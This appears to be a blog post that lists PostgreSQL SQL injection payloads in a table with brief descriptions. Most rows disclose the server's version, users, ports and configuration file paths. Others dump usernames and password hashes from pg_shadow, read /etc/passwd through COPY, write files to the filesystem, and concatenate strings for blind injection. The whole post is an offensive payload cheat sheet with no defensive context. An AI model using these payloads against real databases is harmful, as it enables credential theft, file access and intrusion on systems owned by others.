» PostgreSQL
| Payload | Description (if any) |
| select version(); | View database version. |
| select current_database(); | Misc. information disclosure |
| select current_user; | Misc. information disclosure |
| select session_user; | Misc. information disclosure |
| select current_setting(’log_connections’); | Misc. information disclosure |
| select current_setting(’log_statement’); | Misc. information disclosure |
| select current_setting(’port’); | Misc. information disclosure |
| select current_setting(’password_encryption’); | Misc. information disclosure |
| select current_setting(’krb_server_keyfile’); | Misc. information disclosure |
| select current_setting(’virtual_host’); | Misc. information disclosure |
| select current_setting(’port’); | Misc. information disclosure |
| select current_setting(’config_file’); | Misc. information disclosure |
| select current_setting(’hba_file’); | Misc. information disclosure |
| select current_setting(’data_directory’); | Misc. information disclosure |
| select * from pg_shadow; | View database usernames and passwords. |
| select * from pg_group; | View database usernames and passwords. |
| create table myfile (input TEXT); copy myfile from ‘/etc/passwd’; select * from myfile; | Read files on the filesystem. |
| copy myfile to ‘/tmp/test’; | Write files to filesystem. |
| str1 || str2 | Concat strings for blind SQL Injection tests. |
No Response to "PostgreSQL"
Post a Comment